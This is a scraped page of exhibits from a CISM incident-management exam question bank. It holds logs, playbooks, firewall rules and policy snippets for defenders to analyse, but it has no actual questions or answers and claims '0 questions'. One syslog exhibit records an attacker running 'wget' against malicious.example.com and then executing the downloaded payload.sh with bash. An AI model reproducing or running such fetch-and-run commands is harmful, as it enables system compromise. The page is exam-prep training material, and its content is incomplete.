CISM Incident Management • Complete Question Bank
Complete CISM Incident Management question bank — all 0 questions with answers and detailed explanations.
Refer to the exhibit. ``` [Alert] Correlation Rule: Multiple Failed Logins Source IP: 10.0.0.55 Destination IP: 192.168.1.10 Event Count: 150 failed logins to admin account 'jsmith' within 5 minutes Action: Triggered ```
Refer to the exhibit. ``` # netstat -an | grep :443 tcp4 0 0 *.443 *.* LISTEN tcp4 0 0 192.168.1.100.443 10.0.0.1.54321 ESTABLISHED tcp4 0 0 192.168.1.100.443 10.0.0.2.54322 ESTABLISHED tcp4 0 0 192.168.1.100.443 203.0.113.5.44333 ESTABLISHED ```
Refer to the exhibit. ``` Policy: IncidentResponse - Phase: Detection - Action: Alert security team - Phase: Analysis - Action: Determine scope and impact - Phase: Containment - Action: Isolate affected systems - Phase: Eradication - Action: Remove malware - Phase: Recovery - Action: Restore from backup - Phase: Post-Incident - Action: Conduct lessons learned ```
Refer to the exhibit. --- Incident Log: [2025-03-20 08:15:23] ALERT: Multiple failed logins for user 'jsmith' from IP 10.0.0.45 [2025-03-20 08:16:01] ALERT: Successful login for user 'jsmith' from IP 10.0.0.45 [2025-03-20 08:20:45] ALERT: Unusual outbound connection from host 10.0.0.45 to 198.51.100.10:4444 [2025-03-20 08:22:30] ALERT: Large data transfer from host 10.0.0.45 to 198.51.100.10 ---
Refer to the exhibit. --- Incident Response Playbook: Ransomware Phase 1: Identification - Confirm ransomware via user reports and endpoint alerts. Phase 2: Containment - Disconnect affected systems from the network. Do not power off. Phase 3: Eradication - Remove malware using approved tools; reimage if necessary. Phase 4: Recovery - Restore data from clean backups; verify integrity. Phase 5: Post-Incident - Conduct lessons learned. ---
Refer to the exhibit. Exhibit: Event Log Entry: Time: 2023-10-05 14:23:17 Event ID: 4625 Source: Security User: SYSTEM Logon Type: 3 Account Name: jdoe Account Domain: CORP Failure Reason: Unknown user name or bad password. Workstation Name: WS-001 IP Address: 192.168.1.50 Event Log Entry: Time: 2023-10-05 14:24:05 Event ID: 4624 Source: Security User: SYSTEM Logon Type: 3 Account Name: jdoe Account Domain: CORP Workstation Name: WS-001 IP Address: 192.168.1.50 Event Log Entry: Time: 2023-10-05 14:25:10 Event ID: 4648 Source: Security User: jdoe Logon Type: 2 Account Name: jdoe Account Domain: CORP Target Server: FILE-SRV-01 Additional Info: A logon was attempted using explicit credentials. Workstation Name: WS-001 IP Address: 192.168.1.50
Refer to the exhibit. Exhibit: Firewall Log: Date Time Source IP Destination IP Port Protocol Action 2023-10-05 10:00:00 10.0.0.15 203.0.113.5 443 TCP ALLOW 2023-10-05 10:01:00 10.0.0.15 203.0.113.5 443 TCP ALLOW 2023-10-05 10:02:00 10.0.0.15 203.0.113.5 443 TCP ALLOW ... (repeated every minute) 2023-10-05 12:00:00 10.0.0.15 203.0.113.5 443 TCP ALLOW IDS Alert: Signature: ET TROJAN Win32/Malicious Beacon Source IP: 10.0.0.15 Destination IP: 203.0.113.5 Time: 2023-10-05 10:00:00 Severity: High
Refer to the exhibit. Exhibit: Incident Response Plan - Roles and Responsibilities: - Incident Response Manager: Coordinates response efforts. - Technical Lead: Performs technical analysis and containment. - Legal Counsel: Advises on legal and regulatory obligations. - Communications Lead: Manages internal and external communications. - Human Resources: Handles employee-related matters if involved. - IT Support: Provides technical assistance as needed. Scenario: A phishing attack has compromised several user credentials. The incident response team has been activated.
Refer to the exhibit. ``` [2025-03-10 14:32:15] CRITICAL: File integrity violation on /etc/passwd [2025-03-10 14:32:15] File: /etc/passwd, Expected hash: a1b2c3d4e5f6, Actual hash: 9z8y7x6w5v4u [2025-03-10 14:32:16] ALERT: Unauthorized SSH key added to /home/admin/.ssh/authorized_keys [2025-03-10 14:32:18] ALERT: New user 'backup_agent' created with UID 0 ```
Drag steps to the numbered slots on the right, or tap a step then tap a slot.
Drag steps to the numbered slots on the right, or tap a step then tap a slot.
Drag a concept onto its matching description — or click a concept then click the description.
Develop incident response plan and train team
Identify and validate security incidents
Isolate threat, remove malware, restore operations
Conduct lessons learned and update procedures
Notify stakeholders and regulatory bodies
Drag a concept onto its matching description — or click a concept then click the description.
No restrictions; can be freely distributed
Access limited to employees; no external sharing
Access on need-to-know basis; encryption required
Highly sensitive; strict access control and logging
Subject to legal/compliance requirements (e.g., PII)
Refer to the exhibit. Exhibit: Syslog output from a compromised server: Mar 15 10:23:45 server1 sshd[1234]: Failed password for root from 10.0.0.50 port 2222 ssh2 Mar 15 10:23:50 server1 sshd[1234]: Failed password for root from 10.0.0.50 port 2222 ssh2 ... (repeated 100 times) Mar 15 10:25:00 server1 kernel: nf_conntrack: table full, dropping packet. Mar 15 10:25:02 server1 sshd[1235]: Accepted publickey for admin from 10.0.0.51 port 4444 ssh2 Mar 15 10:25:10 server1 bash: sudo: whoami Mar 15 10:25:12 server1 bash: sudo: wget http://malicious.example.com/payload.sh Mar 15 10:25:30 server1 bash: bash payload.sh
Refer to the exhibit. Exhibit: Incident response plan excerpt: "\n Triage Priority Matrix:\n - Critical (C): PII or financial data affected, regulatory implications, widespread impact\n - High (H): Sensitive business data, limited user impact, potential for escalation\n - Medium (M): Internal operational data, no regulatory impact, isolated systems\n - Low (L): Low-value data, no sensitive information, easily restored\n"
Refer to the exhibit.
Exhibit: JSON policy snippet for an incident response automation:
{
"policy_name": "Auto-Contain Malicious IP",
"trigger": "SIEM_alert.severity >= 5",
"actions": [
{"action": "block_ip", "target": "alert.source_ip"},
{"action": "isolate_host", "target": "alert.target_host"},
{"action": "create_ticket", "assignee": "IR_team"}
],
"notify": ["SOC_manager"],
"auto_approve": true
}Refer to the exhibit. Alert: 'Elevated number of failed logins from IP 10.0.0.5 to multiple user accounts on Domain Controller.' Time: 2025-03-01 14:23:45 Additional details: 50 failed attempts in 30 seconds.
Refer to the exhibit. ``` [incident_response] playbook = "playbook_standard" priority_override = False notification_email = "ir-team@company.com" auto_contain = True ```
Refer to the exhibit. [2025-04-01 08:12:33] ERROR: Firewall rule 'Allow-Internal-Web' permit tcp 10.0.0.0/8 192.168.1.0/24 port 80 [2025-04-01 08:12:34] ALERT: IDS signature 'WEB-MISC cross-site scripting attempt' from 10.5.5.5 to 192.168.1.10:80
Refer to the exhibit. [Incident Response Plan Roles] Role: Incident Manager - Coordinates response Role: Technical Lead - Performs analysis Role: Communication Lead - Handles communications Role: Legal Counsel - Provides legal guidance
Refer to the exhibit. [Threat Intelligence Feed] Indicator: 203.0.113.5 Type: IP Confidence: High Tags: C2, Malware [Proxy Log] src=10.0.1.50 dst=203.0.113.5 port=443 action=ALLOWED
Refer to the exhibit. [Incident Log Summary] Date Range: 2024-01-01 to 2024-06-30 Total Incidents Reported: 120 Incidents with reported response time > 24 hours: 12 Incidents with no documentation: 45
[2025-04-09 10:23:45] ALERT: User 'jdoe' logged in from IP 198.51.100.100 (unusual location) at 10:23:45. [2025-04-09 10:24:10] EVENT: User 'jdoe' attempted to access /admin/config with lack of privilege. [2025-04-09 10:25:00] EVENT: User 'jdoe' accessed /finance/customers.xlsx and downloaded 500MB. [2025-04-09 10:25:30] ALERT: Large data transfer from internal IP to external IP 203.0.113.5.
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::company-reports/*",
"Condition": {
"IpAddress": {
"aws:SourceIp": "10.0.0.0/8"
}
}
},
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::company-reports/*"
}
]
}2025-04-09 10:30:00 192.168.1.10 -> 10.10.10.10:3306 (MySQL) - 10 connections 2025-04-09 10:30:05 192.168.1.10 -> 10.10.10.10:3306 - 20 connections 2025-04-09 10:30:10 192.168.1.10 -> 10.10.10.10:3306 - 50 connections 2025-04-09 10:30:15 192.168.1.10 -> 10.10.10.10:3306 - 100 connections
[IDS Alert] Signature: ET TROJAN Known Botnet C2 1 Source: 10.0.1.50:443 -> Destination: 203.0.113.5:8080 Payload: [encrypted]
[Windows Event Log] Event ID 4688: A new process has been created. Creator Subject: Security ID: S-1-5-21-... Account Name: jdoe Process Information: New Process ID: 0x1a2b New Process Name: C:\Users\jdoe\AppData\Local\Temp\svchost.exe
Firewall Rule (inbound): allow tcp any any 22 (SSH) log Firewall Rule (inbound): allow tcp 10.0.0.0/24 any 3389 (RDP) log Firewall Rule (inbound): allow tcp any any 80 (HTTP) log Firewall Rule (inbound): allow tcp any any 443 (HTTPS) log Firewall Rule (inbound): allow tcp 10.0.0.0/24 any 3306 (MySQL) log
Refer to the exhibit. Exhibit: ``` 2024-11-20T15:23:45Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2 2024-11-20T15:23:47Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2 2024-11-20T15:23:49Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2 2024-11-20T15:23:51Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2 2024-11-20T15:23:53Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2 ```